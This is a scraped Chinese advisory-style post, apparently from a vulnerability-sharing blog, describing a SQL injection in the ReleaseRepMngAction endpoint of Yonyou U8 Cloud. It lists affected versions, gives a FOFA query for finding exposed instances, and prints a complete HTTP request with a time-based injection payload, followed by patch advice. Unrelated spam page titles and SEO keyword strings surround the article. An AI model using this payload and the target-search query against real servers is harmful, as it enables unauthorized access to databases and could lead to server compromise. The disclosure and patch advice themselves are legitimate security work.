当前位置: 首页 > news >正文

石家庄制作网站公司有哪些2345浏览器下载

石家庄制作网站公司有哪些,2345浏览器下载,申请域名注册备案平台,重庆建站管理系统价格大家好,今天是Dest1ny漏洞库的专题!! 会时不时发送新的漏洞资讯!! 大家多多关注,多多点赞!!! 0x01 产品简介 用友U8 Cloud是用友推出的新一代云ERP,主要聚…

大家好,今天是Dest1ny漏洞库的专题!!

会时不时发送新的漏洞资讯!!

大家多多关注,多多点赞!!!


0x01 产品简介

用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。是基于全新的企业互联网理念设计的云ERP系统,它旨在为企业提供集人财物客产供销于一体的云ERP整体解决方案,推动企业敏经营、轻管理、简IT,助力企业实现高速发展与云化创新。

0x02 漏洞概述

用友U8 Cloud ReleaseRepMngAction 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

version = 1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp

0x04 复现环境

FOFA:title=="U8C"

0x05 漏洞复现

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

延时5秒

Sqlmap验证

0x06 修复建议

升级补丁<U8CLOUD系统ReleaseRepMngAction接口存在SQL注入漏洞的安全补丁>

http://www.dinnco.com/news/5721.html

相关文章:

  • 汕头教育的网站建设江西seo推广软件
  • 杭州建设网杭州造价平台如何做谷歌seo推广
  • 广州涉疫重点场所有更新南京百度seo代理
  • 做网站备案的公司广州seo招聘信息
  • 加强档案网站建设小程序开发工具
  • 做守望先锋h的网站怎样留别人电话在广告上
  • 做职业资格考试的网站有哪些引擎搜索技巧
  • 网站建设市场需求大南宁seo优势
  • 网站资料如何做参考文献百度推广客户端教程
  • 万网域名绑定到其它网站企业培训课程设置
  • 怎样自己做企业网站信息流广告投放平台
  • 合肥有没有做网站的单位关于软文营销的案例
  • 做海报的素材那个网站比较好百度免费发布信息
  • 沧州网站建设哪家好汕头seo
  • 哪些网站做微课赚钱免费推广软件工具
  • 企业网站网页打开慢友情链接的检查方法
  • wordpress 显示视频孝感seo
  • 东莞虎门高铁站成都网站搜索排名优化公司
  • h5个人网站模板源码云南seo简单整站优化
  • 怎么进成品网站后台陕西网站推广公司
  • 做网站推广方法有哪些巩义网站优化公司
  • 哪些网站是用h5做的销售课程培训视频教程
  • 营销型网站主机seo优化排名教程百度技术
  • 我们高清在线观看免费韩剧搜索引擎优化的具体操作
  • 做网站体会淘宝搜索关键词查询工具
  • 做视频给网站到流量免费自建网站有哪些
  • 天津网站优化步骤sem广告投放是做什么的
  • 阿甘网站建设营销推广案例
  • 怎么做外贸网站东莞seo技术培训
  • 对网站做综合搜索引擎优化分析互联网营销的五个手段